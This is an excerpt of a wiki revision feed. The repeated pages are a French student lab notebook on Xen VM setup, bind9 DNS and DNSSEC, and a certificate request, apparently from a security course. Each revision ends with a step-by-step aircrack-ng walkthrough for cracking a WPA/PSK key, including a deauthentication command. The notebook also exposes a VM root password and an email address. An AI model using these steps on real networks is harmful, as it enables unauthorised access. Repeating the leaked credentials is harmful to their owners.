&lt;br /&gt;
 lvcreate -L 10G -n /dev/virtual/ima5-Frotteman-home -v&lt;br /&gt;
 lvcreate -L 10G -n /dev/virtual/ima5-Frotteman-var -v&lt;br /&gt;
&lt;br /&gt;
Ajouts des partitions à la configuration de la machine virtuelle.&lt;br /&gt;
 'phy:/dev/virtual/ima5-Frotteman-home,xvdb,w',&lt;br /&gt;
 'phy:/dev/virtual/ima5-Frotteman-var,xvdc, w',&lt;br /&gt;
&lt;br /&gt;
=Séance4=&lt;br /&gt;
&lt;br /&gt;
Commande pour démarrer la VM lorsqu'elle est totalement éteinte :&lt;br /&gt;
&lt;br /&gt;
 xl create -c /etc/xen/Frotteman.cfg&lt;br /&gt;
&lt;br /&gt;
Nom de domaine réservé sur gandi.net&lt;br /&gt;
&lt;br /&gt;
 faispastomberlasavo.net&lt;br /&gt;
&lt;br /&gt;
=Séance5=&lt;br /&gt;
&lt;br /&gt;
Installation de bind9 sur la VM xen.&lt;br /&gt;
&lt;br /&gt;
Modification du fichier /etc/bind/named.conf.local&lt;br /&gt;
&lt;br /&gt;
 zone &amp;quot;faispastomberlasavo.net&amp;quot; {&lt;br /&gt;
           type master;&lt;br /&gt;
           file &amp;quot;/etc/bind/db.faispastomberlasavo.net&amp;quot;;&lt;br /&gt;
           allow-transfer { 217.70.177.40; };&lt;br /&gt;
      };&lt;br /&gt;
&lt;br /&gt;
Créez le fichier de zone /etc/bind/db.faispastomberlasavo.net&lt;br /&gt;
 &lt;br /&gt;
 TTL    604800&lt;br /&gt;
 @       IN      SOA     ns.faispastomberlasavo.net. root.faispastomberlasavo.net. (&lt;br /&gt;
                        2              ; Serial&lt;br /&gt;
                        604800         ; Refresh&lt;br /&gt;
                         86400         ; Retry&lt;br /&gt;
                       2419200         ; Expire&lt;br /&gt;
                        604800 )       ; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
         IN      NS      ns6.gandi.net.&lt;br /&gt;
 @       IN      NS      ns.faispastomberlasavo.net.&lt;br /&gt;
 ns      IN      A       193.48.57.161&lt;br /&gt;
 www     IN      A       193.48.57.161&lt;br /&gt;
 @       IN      A       193.48.57.161&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Redémarrer bind&lt;br /&gt;
&lt;br /&gt;
 /etc/init.d/bind9 restart&lt;br /&gt;
&lt;br /&gt;
Changez la configuration des serveurs du domaine Gandi &lt;br /&gt;
 DNS1: ns.faispastomberlasavo.net&lt;br /&gt;
 DNS2: ns6.gandi.net&lt;br /&gt;
&lt;br /&gt;
Commande:&lt;br /&gt;
 nslookup www.faispastomberlasavo.net&lt;br /&gt;
&lt;br /&gt;
Résultat:&lt;br /&gt;
 Server:		193.48.57.161&lt;br /&gt;
 Address:	193.48.57.161#53 &lt;br /&gt;
 &lt;br /&gt;
 Name:	www.faispastomberlasavo.net&lt;br /&gt;
 Address: 193.48.57.161&lt;br /&gt;
&lt;br /&gt;
=Séance6=&lt;br /&gt;
commande pour générer certificat SSL &lt;br /&gt;
 &lt;br /&gt;
 openssl req -nodes -newkey rsa:2048 -sha1 -keyout serveur.key -out serveur.csr&lt;br /&gt;
 Country Name (2 letter code) [AU]:FR&lt;br /&gt;
 State or Province Name (full name) [Some-State]:France&lt;br /&gt;
 Locality Name (eg, city) []:Lille&lt;br /&gt;
 Organization Name (eg, company) [Internet Widgits Pty Ltd]:Polytech&lt;br /&gt;
 Organizational Unit Name (eg, section) []:IMA&lt;br /&gt;
 Common Name (e.g. server FQDN or YOUR name) []:faispastomberlasavo.net&lt;br /&gt;
 Email Address []:cedricduval94@gmail.com&lt;br /&gt;
&lt;br /&gt;
On ajoute le contenu du fichier serveur.csr dans gandi&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
DNSSEC&lt;br /&gt;
&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 2048 -f KSK -r /dev/urandom -n ZONE  faispastomberlasavo.net &lt;br /&gt;
&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 1024 -r /dev/urandom -n ZONE  faispastomberlasavo.net &lt;br /&gt;
&lt;br /&gt;
 $include /etc/bind/ faispastomberlasavo.net.dnssec/ faispastomberlasavo.net-ksk.key&lt;br /&gt;
 $include /etc/bind/ faispastomberlasavo.net.dnssec/ faispastomberlasavo.net-zsk.key&lt;br /&gt;
&lt;br /&gt;
 /etc/bind/faispastomberlasavo.net.dnssec# dnssec-signzone -o  faispastomberlasavo.net -k  faispastomberlasavo.net-ksk ../db. faispastomberlasavo.net faispastomberlasavo.net-zsk&lt;br /&gt;
&lt;br /&gt;
 Verifying the zone using the following algorithms: RSASHA1.&lt;br /&gt;
 Zone fully signed:&lt;br /&gt;
 Algorithm: RSASHA1: KSKs: 1 active, 0 stand-by, 0 revoked&lt;br /&gt;
                     ZSKs: 1 active, 0 stand-by, 0 revoked&lt;br /&gt;
 ../db.faispastomberlasavo.net.signed&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 root@Frotteman:/etc/bind# dig DNSKEY faispastomberlasavo.net @localhost&lt;br /&gt;
 &lt;br /&gt;
 ; &amp;lt;&amp;lt;&amp;gt;&amp;gt; DiG 9.9.5-9+deb8u8-Debian &amp;lt;&amp;lt;&amp;gt;&amp;gt; DNSKEY faispastomberlasavo.net @localhost&lt;br /&gt;
 ;; global options: +cmd&lt;br /&gt;
 ;; Got answer:&lt;br /&gt;
 ;; -&amp;gt;&amp;gt;HEADER&amp;lt;&amp;lt;- opcode: QUERY, status: NOERROR, id: 10598&lt;br /&gt;
 ;; flags: qr aa rd ra; QUERY: 1, ANSWER: 2, AUTHORITY: 0, ADDITIONAL: 1&lt;br /&gt;
 &lt;br /&gt;
 ;; OPT PSEUDOSECTION:&lt;br /&gt;
 ; EDNS: version: 0, flags:; udp: 4096&lt;br /&gt;
 ;; QUESTION SECTION:&lt;br /&gt;
 ;faispastomberlasavo.net.	IN	DNSKEY   &lt;br /&gt;
 &lt;br /&gt;
 ;; ANSWER SECTION:&lt;br /&gt;
 faispastomberlasavo.net. 604800	IN	DNSKEY	257 3 5 AwEAAa3Js66YHVQrw4q+4IKA71lRK9AXWznEZyoxVCxr0SSYx+TFUXxh VTbjq1H8aYjwUa1UyuFsHUC72wJcTNCo0DNOX6Qcek/Y9O30x8xnXRdB OsNFLhnc5v4b5mLTGLswS3GpBCgP8+xSj4LmZPrLZneVom5Q2xCl40KT b5WdpMXXmPjaPOk24gdr5QYzZxrSIqmbEjp2DPaCZiAqPJ8hvvqPFQ+Q Bq53a5/ra3PfN1uo0B2WzeGN0nsb3QDLAREmuovHxSJjm23Yv7rcU8eb txBuOPkbgyES/ybN0uWvW3hiHipXeMCa+yRywnle2Ea56k6w4bcPNta3 8qeF3KwqszE=&lt;br /&gt;
 faispastomberlasavo.net. 604800	IN	DNSKEY	256 3 5 AwEAAe+I1C2IYzY323K1HXia8curPC+ZduRAiXpsYMdBRyTQOpxTf0zf ulFh42UOPhRCrYm3CZkOesUjhbS0Z3WVzy6u/RHJDRKiqNUbpnBN8jQf mmhIx8FJU3Kcu5st+T6cRWOEoCQIS6tOM31u5I4NKrhXZamDiV361YTQ nJrJNT//&lt;br /&gt;
 &lt;br /&gt;
 ;; Query time: 0 msec&lt;br /&gt;
 ;; SERVER: 127.0.0.1#53(127.0.0.1)&lt;br /&gt;
 ;; WHEN: Mon Nov 28 17:05:19 CET 2016&lt;br /&gt;
 ;; MSG SIZE  rcvd: 476&lt;br /&gt;
&lt;br /&gt;
==Crack clé WPA/PSK==&lt;br /&gt;
&lt;br /&gt;
Tout d'abord il faut passer l'interface réseau en mode &amp;quot;Monitor&amp;quot;.&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlan1&lt;br /&gt;
&lt;br /&gt;
Nous pouvons détecter les hotspots grâce à l'utilitaire airodump-ng&lt;br /&gt;
&lt;br /&gt;
 airodump-ng --encrypt wpa mon0&lt;br /&gt;
&lt;br /&gt;
Nous voulions trouvé la clé de &amp;quot;cracotte01&amp;quot;, nous avons donc filtré pour le bssid &amp;quot;04:DA:D2:9C:50:50&amp;quot;&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -w out --bssid 04:DA:D2:9C:50:50 mon0&lt;br /&gt;
 aireplay-ng -0 0 -a 04:DA:D2:9C:50:50&lt;br /&gt;
&lt;br /&gt;
Nous avons créer notre dictionnaire de la façon suivante&lt;br /&gt;
&lt;br /&gt;
 crunch 8 8 0123456789 -o dico.txt&lt;br /&gt;
&lt;br /&gt;
Que nous avons tester sur une Zabeth par soucis de rapidité&lt;br /&gt;
 &lt;br /&gt;
 aircrack-ng -w dico.txt out-01.cap&lt;br /&gt;
&lt;br /&gt;
Qui nous a donné le résultat suivant&lt;br /&gt;
&lt;br /&gt;
 [[Fichier:Aircrack_screen.png|200px|thumb|left|texte descriptif]]&lt;/div&gt;</summary>
		<author><name>Cduval</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=Fichier:Aircrack_screen.png&amp;diff=35481</id>
		<title>Fichier:Aircrack screen.png</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=Fichier:Aircrack_screen.png&amp;diff=35481"/>
				<updated>2016-11-28T16:31:11Z</updated>
		
		<summary type="html">&lt;p&gt;Cduval : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;/div&gt;</summary>
		<author><name>Cduval</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=Cahier_2016_groupe_n%C2%B01&amp;diff=35480</id>
		<title>Cahier 2016 groupe n°1</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=Cahier_2016_groupe_n%C2%B01&amp;diff=35480"/>
				<updated>2016-11-28T16:30:35Z</updated>
		
		<summary type="html">&lt;p&gt;Cduval : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Séance 1=&lt;br /&gt;
&lt;br /&gt;
Pour la première séance nous avons installé ifenslave 2.6 sur le serveur et ajout d'un alias pour que le module bond soit activé avec les bonnes options :&lt;br /&gt;
&lt;br /&gt;
 alias bond0 bonding&lt;br /&gt;
 options bonding mode=1 miimon=100 downdelay=200 updelay=200&lt;br /&gt;
&lt;br /&gt;
Nous avons aussi configuré le fichier /etc/network/interfaces&lt;br /&gt;
en y incluant la configuration des différentes interfaces : eth100, eth101 ainsi que la configuration du bridge: br0 et du bonding: bond0.&lt;br /&gt;
&lt;br /&gt;
 #Bonding IMA5sc&lt;br /&gt;
 #auto eth100&lt;br /&gt;
 #iface eth0 inet manual&lt;br /&gt;
 #	bond-master bond0&lt;br /&gt;
 #	bond-primary eth100 eth101&lt;br /&gt;
 #	bond-mode 5&lt;br /&gt;
 &lt;br /&gt;
 #auto eth101&lt;br /&gt;
 #iface eth1 inet manual	&lt;br /&gt;
 #	bond-master bond0&lt;br /&gt;
 #	bond-primary eth100 eth101&lt;br /&gt;
 #	bond-mode 5&lt;br /&gt;
 &lt;br /&gt;
 #auto bond0&lt;br /&gt;
 #iface bond0 inet dhcp&lt;br /&gt;
 #	pre-up modprobe bonding&lt;br /&gt;
 #	pre-up ifconfig bond0 up&lt;br /&gt;
 #	pre-up /sbin/ifenslave  bond0 eth100 eth101&lt;br /&gt;
 #	down sbin/ifenslave -d bond0 eth100 eth101&lt;br /&gt;
 #	bonds-slaves none&lt;br /&gt;
 #&lt;br /&gt;
 #auto br0&lt;br /&gt;
 #iface br0 inet dhcp&lt;br /&gt;
 #	bridge-ports bond0&lt;br /&gt;
&lt;br /&gt;
=Séance 2=&lt;br /&gt;
&lt;br /&gt;
Installation de la machine virtuelle sur le serveur cordouan:&lt;br /&gt;
&lt;br /&gt;
 root@cordouan:/usr/local/xen/domains# xen-create-image --hostname=Frotteman --ip=193.48.57.161 --netmask=255.255.255.240 --gateway=193.48.57.171  --dir=/usr/local/xen --mirror=http://debian.polytech-lille.fr/debian/ --dist=jessie --password=glopglop&lt;br /&gt;
&lt;br /&gt;
 WARNING&lt;br /&gt;
 -------&lt;br /&gt;
 &lt;br /&gt;
  You appear to have a missing vif-script, or network-script, in the&lt;br /&gt;
  Xen configuration file /etc/xen/xend-config.sxp.&lt;br /&gt;
 &lt;br /&gt;
  Please fix this and restart Xend, or your guests will not be able&lt;br /&gt;
 to use any networking!&lt;br /&gt;
 &lt;br /&gt;
 &lt;br /&gt;
 General Information&lt;br /&gt;
 --------------------&lt;br /&gt;
 Hostname       :  Frotteman&lt;br /&gt;
 Distribution   :  jessie&lt;br /&gt;
 Mirror         :  http://debian.polytech-lille.fr/debian/&lt;br /&gt;
 Partitions     :  swap            128M  (swap)&lt;br /&gt;
                   /               4G    (ext3)&lt;br /&gt;
 Image type     :  sparse&lt;br /&gt;
 Memory size    :  128M&lt;br /&gt;
 Kernel path    :  /boot/vmlinuz-3.14-2-amd64&lt;br /&gt;
 Initrd path    :  /boot/initrd.img-3.14-2-amd64&lt;br /&gt;
 &lt;br /&gt;
 Networking Information&lt;br /&gt;
 ----------------------&lt;br /&gt;
 IP Address 1   : 193.48.57.161 [MAC: 00:16:3E:F4:F8:CE]&lt;br /&gt;
 Netmask        : 255.255.255.240&lt;br /&gt;
 Gateway        : 193.48.57.171&lt;br /&gt;
 &lt;br /&gt;
 &lt;br /&gt;
 Creating partition image: /usr/local/xen/domains/Frotteman/swap.img&lt;br /&gt;
 Done&lt;br /&gt;
 &lt;br /&gt;
 Creating swap on /usr/local/xen/domains/Frotteman/swap.img&lt;br /&gt;
 Done&lt;br /&gt;
 &lt;br /&gt;
 Creating partition image: /usr/local/xen/domains/Frotteman/disk.img&lt;br /&gt;
 Done&lt;br /&gt;
 &lt;br /&gt;
 Creating ext3 filesystem on /usr/local/xen/domains/Frotteman/disk.img&lt;br /&gt;
 Done&lt;br /&gt;
 Installation method: debootstrap&lt;br /&gt;
 Done&lt;br /&gt;
 &lt;br /&gt;
 Running hooks&lt;br /&gt;
 Done&lt;br /&gt;
 &lt;br /&gt;
 No role scripts were specified.  Skipping &lt;br /&gt;
 &lt;br /&gt;
 Creating Xen configuration file&lt;br /&gt;
 Done &lt;br /&gt;
 &lt;br /&gt;
 No role scripts were specified.  Skipping&lt;br /&gt;
 Setting up root password&lt;br /&gt;
 Generating a password for the new guest.&lt;br /&gt;
 All done&lt;br /&gt;
 &lt;br /&gt;
 &lt;br /&gt;
 Logfile produced at:&lt;br /&gt;
 	 /var/log/xen-tools/Frotteman.log&lt;br /&gt;
 &lt;br /&gt;
 Installation Summary&lt;br /&gt;
 ---------------------&lt;br /&gt;
 Hostname        :  Frotteman&lt;br /&gt;
 Distribution    :  jessie&lt;br /&gt;
 MAC Address     :  00:16:3E:F4:F8:CE&lt;br /&gt;
 IP Address(es)  :  193.48.57.161 &lt;br /&gt;
 RSA Fingerprint :  37:3f:a5:4a:6d:05:15:3d:55:44:e3:0b:7f:81:91:a2&lt;br /&gt;
 Root Password   :  fsBsiSE4&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=Séance3=&lt;br /&gt;
&lt;br /&gt;
Création des partitions logiques pour la machine virtuelle.&lt;br /&gt;
&lt;br /&gt;
 lvcreate -L 10G -n /dev/virtual/ima5-Frotteman-home -v&lt;br /&gt;
 lvcreate -L 10G -n /dev/virtual/ima5-Frotteman-var -v&lt;br /&gt;
&lt;br /&gt;
Ajouts des partitions à la configuration de la machine virtuelle.&lt;br /&gt;
 'phy:/dev/virtual/ima5-Frotteman-home,xvdb,w',&lt;br /&gt;
 'phy:/dev/virtual/ima5-Frotteman-var,xvdc, w',&lt;br /&gt;
&lt;br /&gt;
=Séance4=&lt;br /&gt;
&lt;br /&gt;
Commande pour démarrer la VM lorsqu'elle est totalement éteinte :&lt;br /&gt;
&lt;br /&gt;
 xl create -c /etc/xen/Frotteman.cfg&lt;br /&gt;
&lt;br /&gt;
Nom de domaine réservé sur gandi.net&lt;br /&gt;
&lt;br /&gt;
 faispastomberlasavo.net&lt;br /&gt;
&lt;br /&gt;
=Séance5=&lt;br /&gt;
&lt;br /&gt;
Installation de bind9 sur la VM xen.&lt;br /&gt;
&lt;br /&gt;
Modification du fichier /etc/bind/named.conf.local&lt;br /&gt;
&lt;br /&gt;
 zone &amp;quot;faispastomberlasavo.net&amp;quot; {&lt;br /&gt;
           type master;&lt;br /&gt;
           file &amp;quot;/etc/bind/db.faispastomberlasavo.net&amp;quot;;&lt;br /&gt;
           allow-transfer { 217.70.177.40; };&lt;br /&gt;
      };&lt;br /&gt;
&lt;br /&gt;
Créez le fichier de zone /etc/bind/db.faispastomberlasavo.net&lt;br /&gt;
 &lt;br /&gt;
 TTL    604800&lt;br /&gt;
 @       IN      SOA     ns.faispastomberlasavo.net. root.faispastomberlasavo.net. (&lt;br /&gt;
                        2              ; Serial&lt;br /&gt;
                        604800         ; Refresh&lt;br /&gt;
                         86400         ; Retry&lt;br /&gt;
                       2419200         ; Expire&lt;br /&gt;
                        604800 )       ; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
         IN      NS      ns6.gandi.net.&lt;br /&gt;
 @       IN      NS      ns.faispastomberlasavo.net.&lt;br /&gt;
 ns      IN      A       193.48.57.161&lt;br /&gt;
 www     IN      A       193.48.57.161&lt;br /&gt;
 @       IN      A       193.48.57.161&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Redémarrer bind&lt;br /&gt;
&lt;br /&gt;
 /etc/init.d/bind9 restart&lt;br /&gt;
&lt;br /&gt;
Changez la configuration des serveurs du domaine Gandi &lt;br /&gt;
 DNS1: ns.faispastomberlasavo.net&lt;br /&gt;
 DNS2: ns6.gandi.net&lt;br /&gt;
&lt;br /&gt;
Commande:&lt;br /&gt;
 nslookup www.faispastomberlasavo.net&lt;br /&gt;
&lt;br /&gt;
Résultat:&lt;br /&gt;
 Server:		193.48.57.161&lt;br /&gt;
 Address:	193.48.57.161#53 &lt;br /&gt;
 &lt;br /&gt;
 Name:	www.faispastomberlasavo.net&lt;br /&gt;
 Address: 193.48.57.161&lt;br /&gt;
&lt;br /&gt;
=Séance6=&lt;br /&gt;
commande pour générer certificat SSL &lt;br /&gt;
 &lt;br /&gt;
 openssl req -nodes -newkey rsa:2048 -sha1 -keyout serveur.key -out serveur.csr&lt;br /&gt;
 Country Name (2 letter code) [AU]:FR&lt;br /&gt;
 State or Province Name (full name) [Some-State]:France&lt;br /&gt;
 Locality Name (eg, city) []:Lille&lt;br /&gt;
 Organization Name (eg, company) [Internet Widgits Pty Ltd]:Polytech&lt;br /&gt;
 Organizational Unit Name (eg, section) []:IMA&lt;br /&gt;
 Common Name (e.g. server FQDN or YOUR name) []:faispastomberlasavo.net&lt;br /&gt;
 Email Address []:cedricduval94@gmail.com&lt;br /&gt;
&lt;br /&gt;
On ajoute le contenu du fichier serveur.csr dans gandi&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
DNSSEC&lt;br /&gt;
&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 2048 -f KSK -r /dev/urandom -n ZONE  faispastomberlasavo.net &lt;br /&gt;
&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 1024 -r /dev/urandom -n ZONE  faispastomberlasavo.net &lt;br /&gt;
&lt;br /&gt;
 $include /etc/bind/ faispastomberlasavo.net.dnssec/ faispastomberlasavo.net-ksk.key&lt;br /&gt;
 $include /etc/bind/ faispastomberlasavo.net.dnssec/ faispastomberlasavo.net-zsk.key&lt;br /&gt;
&lt;br /&gt;
 /etc/bind/faispastomberlasavo.net.dnssec# dnssec-signzone -o  faispastomberlasavo.net -k  faispastomberlasavo.net-ksk ../db. faispastomberlasavo.net faispastomberlasavo.net-zsk&lt;br /&gt;
&lt;br /&gt;
 Verifying the zone using the following algorithms: RSASHA1.&lt;br /&gt;
 Zone fully signed:&lt;br /&gt;
 Algorithm: RSASHA1: KSKs: 1 active, 0 stand-by, 0 revoked&lt;br /&gt;
                     ZSKs: 1 active, 0 stand-by, 0 revoked&lt;br /&gt;
 ../db.faispastomberlasavo.net.signed&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 root@Frotteman:/etc/bind# dig DNSKEY faispastomberlasavo.net @localhost&lt;br /&gt;
 &lt;br /&gt;
 ; &amp;lt;&amp;lt;&amp;gt;&amp;gt; DiG 9.9.5-9+deb8u8-Debian &amp;lt;&amp;lt;&amp;gt;&amp;gt; DNSKEY faispastomberlasavo.net @localhost&lt;br /&gt;
 ;; global options: +cmd&lt;br /&gt;
 ;; Got answer:&lt;br /&gt;
 ;; -&amp;gt;&amp;gt;HEADER&amp;lt;&amp;lt;- opcode: QUERY, status: NOERROR, id: 10598&lt;br /&gt;
 ;; flags: qr aa rd ra; QUERY: 1, ANSWER: 2, AUTHORITY: 0, ADDITIONAL: 1&lt;br /&gt;
 &lt;br /&gt;
 ;; OPT PSEUDOSECTION:&lt;br /&gt;
 ; EDNS: version: 0, flags:; udp: 4096&lt;br /&gt;
 ;; QUESTION SECTION:&lt;br /&gt;
 ;faispastomberlasavo.net.	IN	DNSKEY   &lt;br /&gt;
 &lt;br /&gt;
 ;; ANSWER SECTION:&lt;br /&gt;
 faispastomberlasavo.net. 604800	IN	DNSKEY	257 3 5 AwEAAa3Js66YHVQrw4q+4IKA71lRK9AXWznEZyoxVCxr0SSYx+TFUXxh VTbjq1H8aYjwUa1UyuFsHUC72wJcTNCo0DNOX6Qcek/Y9O30x8xnXRdB OsNFLhnc5v4b5mLTGLswS3GpBCgP8+xSj4LmZPrLZneVom5Q2xCl40KT b5WdpMXXmPjaPOk24gdr5QYzZxrSIqmbEjp2DPaCZiAqPJ8hvvqPFQ+Q Bq53a5/ra3PfN1uo0B2WzeGN0nsb3QDLAREmuovHxSJjm23Yv7rcU8eb txBuOPkbgyES/ybN0uWvW3hiHipXeMCa+yRywnle2Ea56k6w4bcPNta3 8qeF3KwqszE=&lt;br /&gt;
 faispastomberlasavo.net. 604800	IN	DNSKEY	256 3 5 AwEAAe+I1C2IYzY323K1HXia8curPC+ZduRAiXpsYMdBRyTQOpxTf0zf ulFh42UOPhRCrYm3CZkOesUjhbS0Z3WVzy6u/RHJDRKiqNUbpnBN8jQf mmhIx8FJU3Kcu5st+T6cRWOEoCQIS6tOM31u5I4NKrhXZamDiV361YTQ nJrJNT//&lt;br /&gt;
 &lt;br /&gt;
 ;; Query time: 0 msec&lt;br /&gt;
 ;; SERVER: 127.0.0.1#53(127.0.0.1)&lt;br /&gt;
 ;; WHEN: Mon Nov 28 17:05:19 CET 2016&lt;br /&gt;
 ;; MSG SIZE  rcvd: 476&lt;br /&gt;
&lt;br /&gt;
==Crack clé WPA/PSK==&lt;br /&gt;
&lt;br /&gt;
Tout d'abord il faut passer l'interface réseau en mode &amp;quot;Monitor&amp;quot;.&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlan1&lt;br /&gt;
&lt;br /&gt;
Nous pouvons détecter les hotspots grâce à l'utilitaire airodump-ng&lt;br /&gt;
&lt;br /&gt;
 airodump-ng --encrypt wpa mon0&lt;br /&gt;
&lt;br /&gt;
Nous voulions trouvé la clé de &amp;quot;cracotte01&amp;quot;, nous avons donc filtré pour le bssid &amp;quot;04:DA:D2:9C:50:50&amp;quot;&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -w out --bssid 04:DA:D2:9C:50:50 mon0&lt;br /&gt;
 aireplay-ng -0 0 -a 04:DA:D2:9C:50:50&lt;br /&gt;
&lt;br /&gt;
Nous avons créer notre dictionnaire de la façon suivante&lt;br /&gt;
&lt;br /&gt;
 crunch 8 8 0123456789 -o dico.txt&lt;br /&gt;
&lt;br /&gt;
Que nous avons tester sur une Zabeth par soucis de rapidité&lt;br /&gt;
 &lt;br /&gt;
 aircrack-ng -w dico.txt out-01.cap&lt;br /&gt;
&lt;br /&gt;
Qui nous a donné le résultat suivant&lt;br /&gt;
&lt;br /&gt;
/* Image */&lt;/div&gt;</summary>
		<author><name>Cduval</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=Cahier_2016_groupe_n%C2%B01&amp;diff=35479</id>
		<title>Cahier 2016 groupe n°1</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=Cahier_2016_groupe_n%C2%B01&amp;diff=35479"/>
				<updated>2016-11-28T15:06:27Z</updated>
		
		<summary type="html">&lt;p&gt;Cduval : /* Séance6 */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Séance 1=&lt;br /&gt;
&lt;br /&gt;
Pour la première séance nous avons installé ifenslave 2.6 sur le serveur et ajout d'un alias pour que le module bond soit activé avec les bonnes options :&lt;br /&gt;
&lt;br /&gt;
 alias bond0 bonding&lt;br /&gt;
 options bonding mode=1 miimon=100 downdelay=200 updelay=200&lt;br /&gt;
&lt;br /&gt;
Nous avons aussi configuré le fichier /etc/network/interfaces&lt;br /&gt;
en y incluant la configuration des différentes interfaces : eth100, eth101 ainsi que la configuration du bridge: br0 et du bonding: bond0.&lt;br /&gt;
&lt;br /&gt;
 #Bonding IMA5sc&lt;br /&gt;
 #auto eth100&lt;br /&gt;
 #iface eth0 inet manual&lt;br /&gt;
 #	bond-master bond0&lt;br /&gt;
 #	bond-primary eth100 eth101&lt;br /&gt;
 #	bond-mode 5&lt;br /&gt;
 &lt;br /&gt;
 #auto eth101&lt;br /&gt;
 #iface eth1 inet manual	&lt;br /&gt;
 #	bond-master bond0&lt;br /&gt;
 #	bond-primary eth100 eth101&lt;br /&gt;
 #	bond-mode 5&lt;br /&gt;
 &lt;br /&gt;
 #auto bond0&lt;br /&gt;
 #iface bond0 inet dhcp&lt;br /&gt;
 #	pre-up modprobe bonding&lt;br /&gt;
 #	pre-up ifconfig bond0 up&lt;br /&gt;
 #	pre-up /sbin/ifenslave  bond0 eth100 eth101&lt;br /&gt;
 #	down sbin/ifenslave -d bond0 eth100 eth101&lt;br /&gt;
 #	bonds-slaves none&lt;br /&gt;
 #&lt;br /&gt;
 #auto br0&lt;br /&gt;
 #iface br0 inet dhcp&lt;br /&gt;
 #	bridge-ports bond0&lt;br /&gt;
&lt;br /&gt;
=Séance 2=&lt;br /&gt;
&lt;br /&gt;
Installation de la machine virtuelle sur le serveur cordouan:&lt;br /&gt;
&lt;br /&gt;
 root@cordouan:/usr/local/xen/domains# xen-create-image --hostname=Frotteman --ip=193.48.57.161 --netmask=255.255.255.240 --gateway=193.48.57.171  --dir=/usr/local/xen --mirror=http://debian.polytech-lille.fr/debian/ --dist=jessie --password=glopglop&lt;br /&gt;
&lt;br /&gt;
 WARNING&lt;br /&gt;
 -------&lt;br /&gt;
 &lt;br /&gt;
  You appear to have a missing vif-script, or network-script, in the&lt;br /&gt;
  Xen configuration file /etc/xen/xend-config.sxp.&lt;br /&gt;
 &lt;br /&gt;
  Please fix this and restart Xend, or your guests will not be able&lt;br /&gt;
 to use any networking!&lt;br /&gt;
 &lt;br /&gt;
 &lt;br /&gt;
 General Information&lt;br /&gt;
 --------------------&lt;br /&gt;
 Hostname       :  Frotteman&lt;br /&gt;
 Distribution   :  jessie&lt;br /&gt;
 Mirror         :  http://debian.polytech-lille.fr/debian/&lt;br /&gt;
 Partitions     :  swap            128M  (swap)&lt;br /&gt;
                   /               4G    (ext3)&lt;br /&gt;
 Image type     :  sparse&lt;br /&gt;
 Memory size    :  128M&lt;br /&gt;
 Kernel path    :  /boot/vmlinuz-3.14-2-amd64&lt;br /&gt;
 Initrd path    :  /boot/initrd.img-3.14-2-amd64&lt;br /&gt;
 &lt;br /&gt;
 Networking Information&lt;br /&gt;
 ----------------------&lt;br /&gt;
 IP Address 1   : 193.48.57.161 [MAC: 00:16:3E:F4:F8:CE]&lt;br /&gt;
 Netmask        : 255.255.255.240&lt;br /&gt;
 Gateway        : 193.48.57.171&lt;br /&gt;
 &lt;br /&gt;
 &lt;br /&gt;
 Creating partition image: /usr/local/xen/domains/Frotteman/swap.img&lt;br /&gt;
 Done&lt;br /&gt;
 &lt;br /&gt;
 Creating swap on /usr/local/xen/domains/Frotteman/swap.img&lt;br /&gt;
 Done&lt;br /&gt;
 &lt;br /&gt;
 Creating partition image: /usr/local/xen/domains/Frotteman/disk.img&lt;br /&gt;
 Done&lt;br /&gt;
 &lt;br /&gt;
 Creating ext3 filesystem on /usr/local/xen/domains/Frotteman/disk.img&lt;br /&gt;
 Done&lt;br /&gt;
 Installation method: debootstrap&lt;br /&gt;
 Done&lt;br /&gt;
 &lt;br /&gt;
 Running hooks&lt;br /&gt;
 Done&lt;br /&gt;
 &lt;br /&gt;
 No role scripts were specified.  Skipping &lt;br /&gt;
 &lt;br /&gt;
 Creating Xen configuration file&lt;br /&gt;
 Done &lt;br /&gt;
 &lt;br /&gt;
 No role scripts were specified.  Skipping&lt;br /&gt;
 Setting up root password&lt;br /&gt;
 Generating a password for the new guest.&lt;br /&gt;
 All done&lt;br /&gt;
 &lt;br /&gt;
 &lt;br /&gt;
 Logfile produced at:&lt;br /&gt;
 	 /var/log/xen-tools/Frotteman.log&lt;br /&gt;
 &lt;br /&gt;
 Installation Summary&lt;br /&gt;
 ---------------------&lt;br /&gt;
 Hostname        :  Frotteman&lt;br /&gt;
 Distribution    :  jessie&lt;br /&gt;
 MAC Address     :  00:16:3E:F4:F8:CE&lt;br /&gt;
 IP Address(es)  :  193.48.57.161 &lt;br /&gt;
 RSA Fingerprint :  37:3f:a5:4a:6d:05:15:3d:55:44:e3:0b:7f:81:91:a2&lt;br /&gt;
 Root Password   :  fsBsiSE4&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=Séance3=&lt;br /&gt;
&lt;br /&gt;
Création des partitions logiques pour la machine virtuelle.&lt;br /&gt;
